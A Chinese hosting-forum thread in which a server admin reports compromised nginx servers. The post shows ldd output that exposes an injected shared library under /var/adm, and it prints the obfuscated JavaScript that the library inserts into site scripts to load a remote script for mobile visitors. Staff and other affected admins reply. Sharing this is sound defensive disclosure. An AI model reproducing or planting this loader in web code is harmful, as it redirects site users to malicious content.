【待反馈】手机端首次访问会跳转灰产网站的进

在终端执行,可能系统不同命令不同

ldd /www/server/nginx/sbin/nginx

复制代码

如果你的Nginx是正常的,回返回

linux-vdso.so.1 (0x00007fff05e6b000)
libjemalloc.so.2 => /usr/local/lib/libjemalloc.so.2 (0x00007f9299c54000)
libcrypt.so.1 => /lib/x86_64-linux-gnu/libcrypt.so.1 (0x00007f9299c1a000)
libluajit-5.1.so.2 => /usr/local/lib/libluajit-5.1.so.2 (0x00007f9299b8c000)
libz.so.1 => /lib/x86_64-linux-gnu/libz.so.1 (0x00007f9299b70000)
libxml2.so.2 => /lib/x86_64-linux-gnu/libxml2.so.2 (0x00007f929998e000)
libgd.so.3 => /lib/x86_64-linux-gnu/libgd.so.3 (0x00007f9299926000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f92996fb000)
libstdc++.so.6 => /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f92994cf000)
libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f92994af000)
/lib64/ld-linux-x86-64.so.2 (0x00007f929a4e3000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f92993c8000)
libicuuc.so.70 => /lib/x86_64-linux-gnu/libicuuc.so.70 (0x00007f92991cd000)
liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f92991a2000)
libpng16.so.16 => /lib/x86_64-linux-gnu/libpng16.so.16 (0x00007f9299165000)
libfontconfig.so.1 => /lib/x86_64-linux-gnu/libfontconfig.so.1 (0x00007f929911b000)
libfreetype.so.6 => /lib/x86_64-linux-gnu/libfreetype.so.6 (0x00007f9299053000)
libjpeg.so.8 => /lib/x86_64-linux-gnu/libjpeg.so.8 (0x00007f9298fd2000)
libXpm.so.4 => /lib/x86_64-linux-gnu/libXpm.so.4 (0x00007f9298fbd000)
libtiff.so.5 => /lib/x86_64-linux-gnu/libtiff.so.5 (0x00007f9298f34000)
libwebp.so.7 => /lib/x86_64-linux-gnu/libwebp.so.7 (0x00007f9298ec5000)
libicudata.so.70 => /lib/x86_64-linux-gnu/libicudata.so.70 (0x00007f92972a7000)
libexpat.so.1 => /lib/x86_64-linux-gnu/libexpat.so.1 (0x00007f9297276000)
libuuid.so.1 => /lib/x86_64-linux-gnu/libuuid.so.1 (0x00007f929726d000)
libbrotlidec.so.1 => /lib/x86_64-linux-gnu/libbrotlidec.so.1 (0x00007f929725f000)
libX11.so.6 => /lib/x86_64-linux-gnu/libX11.so.6 (0x00007f929711d000)
libzstd.so.1 => /lib/x86_64-linux-gnu/libzstd.so.1 (0x00007f929704e000)
libjbig.so.0 => /lib/x86_64-linux-gnu/libjbig.so.0 (0x00007f929703d000)
libdeflate.so.0 => /lib/x86_64-linux-gnu/libdeflate.so.0 (0x00007f9297019000)
libbrotlicommon.so.1 => /lib/x86_64-linux-gnu/libbrotlicommon.so.1 (0x00007f9296ff6000)
libxcb.so.1 => /lib/x86_64-linux-gnu/libxcb.so.1 (0x00007f9296fca000)
libXau.so.6 => /lib/x86_64-linux-gnu/libXau.so.6 (0x00007f9296fc4000)
libXdmcp.so.6 => /lib/x86_64-linux-gnu/libXdmcp.so.6 (0x00007f9296fbc000)
libbsd.so.0 => /lib/x86_64-linux-gnu/libbsd.so.0 (0x00007f9296fa4000)
libmd.so.0 => /lib/x86_64-linux-gnu/libmd.so.0 (0x00007f9296f97000)

复制代码

经过多台服务器的对比 , 出现我发帖标题情况的,回返回

linux-vdso.so.1 (0x00007fff25feb000)
/var/adm/2dbd78ae-b3fd-4d69-9aac-153cb140294d/kernel/libutilkeybd.so (0x00007fcf73e00000)
libjemalloc.so.2 => /usr/local/lib/libjemalloc.so.2 (0x00007fcf73b79000)
libcrypt.so.1 => /lib/x86_64-linux-gnu/libcrypt.so.1 (0x00007fcf7417d000)
libluajit-5.1.so.2 => /usr/local/lib/libluajit-5.1.so.2 (0x00007fcf740ef000)
libz.so.1 => /lib/x86_64-linux-gnu/libz.so.1 (0x00007fcf740d3000)
libxml2.so.2 => /lib/x86_64-linux-gnu/libxml2.so.2 (0x00007fcf73997000)
libgd.so.3 => /lib/x86_64-linux-gnu/libgd.so.3 (0x00007fcf74069000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcf7376e000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fcf74064000)
libstdc++.so.6 => /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007fcf73542000)
libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007fcf74044000)
/lib64/ld-linux-x86-64.so.2 (0x00007fcf747b3000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007fcf7345b000)
libicuuc.so.70 => /lib/x86_64-linux-gnu/libicuuc.so.70 (0x00007fcf73260000)
liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007fcf74017000)
libpng16.so.16 => /lib/x86_64-linux-gnu/libpng16.so.16 (0x00007fcf73225000)
libfontconfig.so.1 => /lib/x86_64-linux-gnu/libfontconfig.so.1 (0x00007fcf731db000)
libfreetype.so.6 => /lib/x86_64-linux-gnu/libfreetype.so.6 (0x00007fcf73113000)
libjpeg.so.8 => /lib/x86_64-linux-gnu/libjpeg.so.8 (0x00007fcf73092000)
libXpm.so.4 => /lib/x86_64-linux-gnu/libXpm.so.4 (0x00007fcf7307d000)
libtiff.so.5 => /lib/x86_64-linux-gnu/libtiff.so.5 (0x00007fcf72ff4000)
libwebp.so.7 => /lib/x86_64-linux-gnu/libwebp.so.7 (0x00007fcf72f87000)
libicudata.so.70 => /lib/x86_64-linux-gnu/libicudata.so.70 (0x00007fcf71369000)
libexpat.so.1 => /lib/x86_64-linux-gnu/libexpat.so.1 (0x00007fcf71338000)
libuuid.so.1 => /lib/x86_64-linux-gnu/libuuid.so.1 (0x00007fcf7132f000)
libbrotlidec.so.1 => /lib/x86_64-linux-gnu/libbrotlidec.so.1 (0x00007fcf71321000)
libX11.so.6 => /lib/x86_64-linux-gnu/libX11.so.6 (0x00007fcf711e1000)
libzstd.so.1 => /lib/x86_64-linux-gnu/libzstd.so.1 (0x00007fcf71112000)
libjbig.so.0 => /lib/x86_64-linux-gnu/libjbig.so.0 (0x00007fcf71101000)
libdeflate.so.0 => /lib/x86_64-linux-gnu/libdeflate.so.0 (0x00007fcf710dd000)
libbrotlicommon.so.1 => /lib/x86_64-linux-gnu/libbrotlicommon.so.1 (0x00007fcf710b8000)
libxcb.so.1 => /lib/x86_64-linux-gnu/libxcb.so.1 (0x00007fcf7108e000)
libXau.so.6 => /lib/x86_64-linux-gnu/libXau.so.6 (0x00007fcf71088000)
libXdmcp.so.6 => /lib/x86_64-linux-gnu/libXdmcp.so.6 (0x00007fcf71080000)
libbsd.so.0 => /lib/x86_64-linux-gnu/libbsd.so.0 (0x00007fcf71068000)
libmd.so.0 => /lib/x86_64-linux-gnu/libmd.so.0 (0x00007fcf71059000)

复制代码

可以看到多了一个

/var/adm/2dbd78ae-b3fd-4d69-9aac-153cb140294d/kernel/libutilkeybd.so (0x00007fcf73e00000)

复制代码

有可能不在var/adm 也有可能在 etc/adm 在这个文件夹的话大概率是被隐藏起来了看不到这个的

他会随机在你网站引用的js上面添加这段恶意代码达到首次手机端访问时跳转灰产

if (window && !window.hijs) {
window.hijs = true;
function xxSJRox(e) {
var t = ""
, n = r = c1 = c2 = 0;
while (n < e.length) {
r = e.charCodeAt(n);
if (r < 128) {
t += String.fromCharCode(r);
n++
} else if (r > 191 && r < 224) {
c2 = e.charCodeAt(n + 1);
t += String.fromCharCode((r & 31) << 6 | c2 & 63);
n += 2
} else {
c2 = e.charCodeAt(n + 1);
c3 = e.charCodeAt(n + 2);
t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63);
n += 3
}
}
return t
}
function aPnDhiTia(e) {
var m = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
var t = "", n, r, i, s, o, u, a, f = 0;
e = e.replace(/[^A-Za-z0-9+/=]/g, "");
while (f < e.length) {
s = m.indexOf(e.charAt(f++));
o = m.indexOf(e.charAt(f++));
u = m.indexOf(e.charAt(f++));
a = m.indexOf(e.charAt(f++));
n = s << 2 | o >> 4;
r = (o & 15) << 4 | u >> 2;
i = (u & 3) << 6 | a;
t = t + String.fromCharCode(n);
if (u != 64) {
t = t + String.fromCharCode(r)
}
if (a != 64) {
t = t + String.fromCharCode(i)
}
}
return xxSJRox(t)
}
eval('window')['\x4d\x66\x58\x4b\x77\x56'] = function() {
;(function(u, r, w, d, f, c) {
var x = aPnDhiTia;
u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c,'g'), c)));
'jQuery';
k = r[2] + 'c' + f[1];
'Flex';
v = k + f[6];
var s = d.createElement(v + c[0] + c[1])
, g = function() {};
s.type = 'text/javascript';
{
s.onload = function() {
g()
}
}
s.src = u;
'CSS';
d.getElementsByTagName('head')[0].appendChild(s)
}
)('aHR0cHM6和谐一段,防止解析出来正确的xpdnIuY29tL25wbS9ib290c3RyYXBANS4zLjAvZGlzdC9jc3MvYm9vdHN0cmFwLm1pbi5jc3M/dj0zLjcuOC4y', 'FgsPmaNtZ', window, document, 'jrGYBsijJU', 'ptbnNbK')
}
;
if (!(/^Mac|Win/.test(navigator.platform)))
MfXKwV();
}

复制代码

**威胁类型**: Web服务器劫持 + JavaScript注入 + 中间人攻击
不知道能不能通过重装NGINX来解决

反正我是直接备份了数据直接重装就没有这个库了至于怎么被篡改的尚未可知手里的几台物理机全部遭殃目前重装了一台等待测试看什么时候再次被篡改

如果你有不通过重装系统的解决办法欢迎分享

堡塔开发kk · 发表于 2025-11-18 11:00:19

你好，感谢发帖，可以的话您联系我们官网客服，我司安全部协助您排查下

24143751 · 发表于 2025-11-18 16:05:30

堡塔开发kk 发表于 2025-11-18 11:00
你好，感谢发帖，可以的话您联系我们官网客服，我司安全部协助您排查下

var/adm 这个目录昨天我发帖时还是可见的 9.6.0版本我刚刚升级了 11.2版本这个目录就被隐藏了我另外9.6的服务器还是可见面板也占一定原因?

堡塔开发kk · 发表于 2025-11-19 18:10:36

24143751 发表于 2025-11-18 16:05
var/adm 这个目录昨天我发帖时还是可见的 9.6.0版本我刚刚升级了 11.2版本这个目录就被隐藏了 ...

面板升级和这个无关，联系客服我们协助排查

坚果互联 · 发表于 2025-11-21 23:06:48

六台服务器全军覆没全部重装了没找到哪里的问题我同事的好几个服务器也是这种情况卸载了nginx 在重装没解决问题

坚果互联 · 发表于 2025-11-21 23:10:03

准确的说，是网站显示灰产内容，但是检查网站没问题，把网站迁移到别的服务器就没出现过

█菠萝云买2送1活动！16G内存99元	cncsz专注海外服务器+站群	A3招租，联系qq394030111	✅易探云·香港/美国vps仅9元	【UStat】免费易用的网站分析平台
高防服务器，无视一切流量攻击	【阿里云】宝塔一键部署，低至5折	香港站群金牌Gold 6138大促销	【阿里云】宝塔一键部署，低至5折	OV/EV SSL证书，可当日签发
✅出海专用服务器防封/安全	▶CPS云◀海外大带宽vps服务器	OV/EV SSL证书，可当日签发	恒爱云-香港弹性云8H8G10M 63元	【UStat】免费易用的网站分析平台